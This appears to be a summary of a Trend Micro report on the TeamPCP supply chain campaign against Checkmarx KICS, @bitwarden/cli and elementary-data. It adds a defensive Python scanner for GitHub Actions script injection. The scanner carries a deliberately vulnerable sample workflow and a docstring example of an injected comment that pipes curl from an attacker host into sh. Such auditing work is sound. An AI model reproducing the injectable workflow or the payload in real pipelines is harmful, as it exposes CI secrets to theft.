Trend Micro researchers detail TeamPCP, a financially motivated threat actor that ran a coordinated software supply chain campaign from March to April 2026, with at least seven confirmed waves.

Two case studies are examined. In the April 22 Checkmarx KICS attack, the actor simultaneously poisoned Docker Hub images, VS Code/OpenVSX extensions, and GitHub Actions workflows, then used npm tokens stolen by that payload to hijack the @bitwarden/cli package within 24 hours. In the April 24 elementary-data attack, a single unsanitized pull request comment triggered GitHub Actions script injection: the comment text was expanded into a workflow run step before the shell executed it, so the project's own CI built and signed a malicious PyPI package.

Both payloads are credential stealers. They target GitHub personal access tokens, cloud credentials (AWS, GCP, Azure), SSH keys, Kubernetes secrets, database credentials, and cryptocurrency wallets. The elementary-data stealer goes further and makes live AWS API calls to enumerate Secrets Manager and SSM Parameter Store.

Remediation includes rotating every credential that was present on an affected host, performing the rotation from a clean machine; pinning Docker images to verified digests rather than mutable tags; auditing GitHub Actions workflows for user-controlled expressions interpolated directly into run blocks; and applying network egress controls to CI runners so a compromised job cannot freely exfiltrate secrets.
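The run-block audit recommended above can be mechanised. The following is an added example written for this page, not code from Trend Micro or from the elementary-data project; the two embedded workflows are constructed to mirror the pattern described (a comment body interpolated into a run step) and its hardened counterpart. It assumes the GitHub Actions behaviour that `${{ ... }}` expressions are substituted by the runner before the step's shell starts, which is what turns a pull request comment into shell code; passing the value through `env:` and reading it as `"$VAR"` keeps it as data. The list of untrusted contexts is a constructed starting point drawn from GitHub's hardening guidance and should be extended for your own triggers.

```python
"""Flag untrusted ${{ }} expressions interpolated into GitHub Actions run: steps.

Added example (not Trend Micro's or elementary-data's code). Assumption: the
runner expands ${{ github.event.comment.body }} textually before the shell
runs, so a comment containing `"; curl attacker | sh; echo "` executes in CI.
"""
import re

# Event payload fields an outside contributor controls. Constructed list based
# on GitHub's security hardening guidance; extend for your own triggers.
UNTRUSTED_CONTEXTS = re.compile(
    r"\$\{\{\s*(?P<expr>"
    r"github\.event\.(?:"
    r"comment\.body|issue\.(?:title|body)|"
    r"pull_request\.(?:title|body|head\.ref|head\.label)|"
    r"review\.body|review_comment\.body|"
    r"discussion\.(?:title|body)|"
    r"commits\[[^\]]*\]\.message|head_commit\.(?:message|author\.(?:name|email))"
    r")|github\.head_ref"
    r")\s*\}\}"
)

# Matches `run: <inline>` or `run: |` / `run: >` (block scalar), with or without
# a leading list dash. The captured indent decides where a block scalar ends.
RUN_KEY = re.compile(r"^(?P<indent>\s*)(?:-\s+)?run:\s*(?P<value>.*)$")


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" "))


def extract_run_blocks(workflow: str):
    """Yield (first_body_line_no, text) for every run: step, 1-based lines."""
    lines = workflow.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group("indent"))
        value = m.group("value").strip()
        if value.startswith(("|", ">")):
            # Block scalar: body is every following line indented deeper than
            # the key (blank lines allowed), ending at the next sibling key.
            first_body = i + 2
            body = []
            i += 1
            while i < len(lines) and (not lines[i].strip() or _indent(lines[i]) > key_indent):
                body.append(lines[i])
                i += 1
            yield first_body, "\n".join(body)
        else:
            yield i + 1, value
            i += 1


def find_run_injections(workflow: str):
    """Return [(line_no, context_path)] for untrusted contexts inside run: steps.

    Only run: is inspected here; `with:` inputs to actions and the `script:`
    of actions/github-script are separate sinks and need their own checks.
    """
    findings = []
    for first_line, text in extract_run_blocks(workflow):
        for m in UNTRUSTED_CONTEXTS.finditer(text):
            line_no = first_line + text.count("\n", 0, m.start())
            findings.append((line_no, m.group("expr")))
    return findings


# Constructed sample: comment body interpolated straight into the shell.
VULNERABLE_WORKFLOW = r"""name: comment-trigger
on:
  issue_comment:
    types: [created]
jobs:
  handle:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: React to command
        run: |
          echo "Comment was: ${{ github.event.comment.body }}"
          if echo "${{ github.event.comment.body }}" | grep -q '/release'; then
            make release
          fi
      - run: echo "${{ github.event.comment.body }}" >> "$GITHUB_STEP_SUMMARY"
"""

# Constructed sample: same logic, but the comment reaches the shell only as
# an environment variable, so its content is never parsed as code.
HARDENED_WORKFLOW = r"""name: comment-trigger
on:
  issue_comment:
    types: [created]
jobs:
  handle:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: React to command
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
        run: |
          echo "Comment was: $COMMENT_BODY"
          if printf '%s' "$COMMENT_BODY" | grep -q '/release'; then
            make release
          fi
      - run: printf '%s' "$COMMENT_BODY" >> "$GITHUB_STEP_SUMMARY"
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
"""

if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        hits = find_run_injections(wf)
        print(f"{label}: {len(hits)} finding(s)")
        for line_no, expr in hits:
            print(f"  line {line_no}: {expr} interpolated into run:")
```

Run it over every file under `.github/workflows/` in the repository; any hit on a workflow triggered by `issue_comment`, `pull_request_target`, or another event an outside contributor can fire is the pattern the elementary-data attack used. The scanner is deliberately conservative about scope: it reports nothing for the hardened form because the expression sits under `env:`, not `run:`, and it does not inspect `with:` or `actions/github-script` inputs, which need their own review.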